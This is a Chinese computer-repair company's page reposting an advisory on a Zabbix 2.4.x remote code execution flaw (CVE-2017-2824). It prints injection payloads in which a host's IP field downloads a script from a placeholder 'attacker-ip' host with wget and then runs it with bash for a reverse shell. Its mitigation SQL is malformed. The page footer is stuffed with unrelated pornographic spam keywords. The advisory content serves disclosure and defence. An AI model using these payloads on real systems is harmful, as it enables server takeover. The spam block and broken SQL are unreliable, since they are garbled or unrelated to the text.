錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
Zabbix爆遠程代碼執行漏洞、數據庫寫入高危漏洞

作者: 佚名  日期:2017-05-01 18:02:11   來源: 本站整理

 
關于Zabbix
zabbix是一個基于WEB界面的提供分布式系統監視以及網絡監視功能的企業級的開源解決方案。
zabbix能監視各種網絡參數,保證服務器系統的安全運營;并提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。
漏洞描述
    Zabbix Server Active Proxy Trapper 遠程代碼執行漏洞 (CVE-2017-2824)★★★★
    Zabbix 2.4.x中的trapper command功能存在一處代碼執行漏洞,特定的數據包可造成命令注入,進而遠程執行代碼,攻擊者可以從一個Zabbix proxy 發起請求從而促發漏洞。
漏洞細節
該漏洞位于Zabbix中“Trapper”代碼部分,它的主要功能是允許Proxy和Server進行通信的網絡服務(TCP端口10051)Zabbix Server提供了一組針對Zabbix Proxy的API調用,兩個將討論的是“discovery data”和“request command”。這些請求的示例數據如下所示:
'{"request":"command","scriptid":1,"hostid":10001}'
'{"request":"discovery data","host":"zabbix-proxy.com","clock":10,
"data":[{"clock":10,"drule":1,"dcheck2,"type":0,"ip:10.0.0.1, "dns":"zabbix-agent.com",    port":10050,"key":"test","status":0,"value":"test_value"}]}
應該注意的是,request命令調用位于Zabbix數據庫中的腳本,而不進行任何身份驗證。該漏洞的另一個關鍵方面是,默認情況下,Zabbix 2.4.X使用腳本以下表中的3個腳本填充MySQL數據庫:
# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1
問題在于,在調用腳本時,{HOST.CONN}字段實際上被host的IP地址替換。替換{HOST.CONN}的值位于Zabbixinterface表中,然后保存成VARCHAR(64)類型的“IP”字段。因此,如果攻擊者可以使用命令注入創建接口作為IP地址,并且通過“命令”請求的方式運行{HOST.CONN}腳本,則將發生命令注入,并且可以獲得反向shell。
這個難題在于有效地將值插入到Zabbixhost表。默認情況下,未經身份驗證的攻擊者無法做到這一點,它需要系統管理員的一個次要配置,特別是關于Zabbix自動發現功能。
Zabbix自動發現和自動注冊功能允許根據Zabbix Proxy提供的Zabbix Server數據進行Zabbix Server的配置。更具體地說,如果主機根據服務器的配置向Zabbix Proxy提供某些特性,則可能會采取某些操作,其中一個會使新發現的主機被添加到某些Zabbix數據庫表中。在這種情況下,主機將被插入到“host”表中,并且將創建一個入口到Zabbixinterface表中,主機提供的IP地址插入到IP列中,而不會對該IP地址的任何驗證。
因此,通過使用合適的主機向服務器發送一個發現數據請求,可以將命令注入插入到數據庫中:
 write_script_cmd='{
"request":"discoverydata",
"host":"zabbix-proxy.domain.fake",
"clock":148535399,
"data":[{
"clock":1485353070,
"drule":88,
"dcheck":174,
"type":0,
"ip":";wget -O/tmp/shttp://attacker-ip/s;#",
"dns":"host28.domain.fake",
"port":10050,
"key":"sectest",
"status":0,
"value":"lnxhost"
}]}'
由于ZabbixInterface表的ip字段的大小限制,第二個主機被插入到另一個IP地址的表中。
// Host 2
ip:/bin/bash /tmp/s;#
在這兩個主機被添加之后,仍然有一個問題,即不知道該hostid的command請求,但是這很容易解決了。暴力請求入數據庫,因為不同的命令請求會返回不同的響應,確定主機是否存在,一旦存在的主機被確定,就可以直接調用它們,并且可以獲得反向的shell。命令請求如下所示
run_cmd = '{
"request":"command",
"scriptid":1,
"hostid":14666
}'
   
緩解措施
    刪除Zabbix數據庫中的默認腳本條目,可以直接操作數據庫刪除 sql 為: use zabbix; delete * from scripts;  ,也可使用圖形界面刪除 (Administration->Scripts->Checkmarks->Delete Selected).
    
    Zabbix Proxy 數據庫寫入漏洞(CVE-2017-2824)
    Zabbix 2.4.x中的trapper功能存在一處數據庫寫漏洞,特定的惡意trapper數據包可通過database 的邏輯檢查,造成數據庫寫入,攻擊者可通過中間人的方式修改zabbix  proxy 和 Server間的請求來觸發漏洞。
影響版本   
 Zabbix 2.4.7 - 2.4.8r1
參考
http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html
http://www.talosintelligence.com/reports/TALOS-2017-0325/
http://www.talosintelligence.com/reports/TALOS-2017-0326/
https://support.zabbix.com/browse/ZBX-12075
https://support.zabbix.com/browse/ZBX-12076



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 一本加勒比hezyo无码专区| 精品无码国产自产拍在线观看蜜 | 亚洲国产精品无码久久一线| 13小箩利洗澡无码视频网站免费| 中文字幕有码无码AV| 亚洲av无码专区在线观看下载| 一本久道中文无码字幕av| 亚洲综合久久精品无码色欲| 特黄熟妇丰满人妻无码| 久久久久久无码Av成人影院| 久久中文字幕无码专区| 亚洲日韩国产AV无码无码精品| 亚洲中文久久精品无码ww16| 国产精品亚洲а∨无码播放不卡 | 国产自无码视频在线观看| 一本久道综合在线无码人妻| 国产AV无码专区亚洲A∨毛片| 人妻无码一区二区三区| 国产丰满乱子伦无码专| 啊灬啊别停灬用力啊无码视频| 亚洲精品无码专区在线在线播放| 无码国产亚洲日韩国精品视频一区二区三区 | 国产在线拍揄自揄拍无码 | 精品久久久无码中文字幕| 亚洲αⅴ无码乱码在线观看性色| 亚洲av无码不卡一区二区三区| 狠狠躁夜夜躁无码中文字幕| 精品无码黑人又粗又大又长| 青青爽无码视频在线观看| 午夜无码熟熟妇丰满人妻| 亚洲精品无码专区在线播放| 伊人天堂av无码av日韩av| 久久亚洲AV无码精品色午夜麻豆| 日韩乱码人妻无码中文字幕| 无码专区AAAAAA免费视频| 久久无码人妻一区二区三区| 日韩乱码人妻无码中文字幕久久| 秋霞鲁丝片Av无码少妇| 亚洲a∨无码男人的天堂| 久久久久精品国产亚洲AV无码| 亚洲AV无码乱码麻豆精品国产|